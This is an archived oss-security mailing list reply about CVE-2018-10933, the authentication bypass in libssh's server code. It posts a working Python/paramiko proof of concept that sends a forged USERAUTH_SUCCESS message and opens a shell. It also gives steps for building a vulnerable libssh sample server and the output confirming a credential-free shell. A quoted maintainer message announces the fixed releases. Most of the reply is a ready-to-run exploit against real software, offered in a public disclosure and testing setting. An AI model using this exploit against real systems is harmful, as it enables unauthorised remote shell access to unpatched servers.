Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Wed, 17 Oct 2018 16:13:24 +0700
From: Minh Tuan Luong <not.soledad@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2018-10933: libssh: authentication bypass in
 server code

I have coded a simple POC for this CVE:

--- CVE-2018-10933.py ----

import paramiko
import socket
import sys

nbytes = 4096
hostname = "127.0.0.1"
port = 2222

sock = socket.socket()
try:
     sock.connect((hostname, port))
     # instantiate transport
     m = paramiko.message.Message()
     transport = paramiko.transport.Transport(sock)
     transport.start_client()

     m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
     transport._send_message(m)

     cmd_channel = transport.open_session()
     cmd_channel.invoke_shell()

except socket.error:
     print '[-] Connecting to host failed. Please check the specified 
host and port.'
     sys.exit(1)

-----

to test this code: get vulnerable version of libssh at homepage: 
https://www.libssh.org/files/0.7/libssh-0.7.4.tar.xz
after uncompress and build, go to example directory, there's a simple 
sshd server using libssh name: samplesshd-cb

run this simple sshd by command:
     $ samplesshd-cb 127.0.0.1 -p 2222
then run my code, output will be:
Allocated session channel
Allocated shell
mean that i can bypass authentication and spawn a shell without any 
credential

Regard, Soledad

On 10/16/2018 7:21 PM, Marcus Meissner wrote:
> Hi,
>
> https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/
>
> -----
> libssh 0.8.4 and 0.7.6 security and bugfix release
>
> This is an important security and maintenance release in order to address CVE-2018-10933.
>
> libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication, the attacker could successfully authentciate without any credentials.
>
> The bug was discovered by Peter Winter-Smith of NCC Group.
> -----
>
> This only affects libssh operating in _server_ mode, but not the usual used client mode.
>
> Ciao, Marcus

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.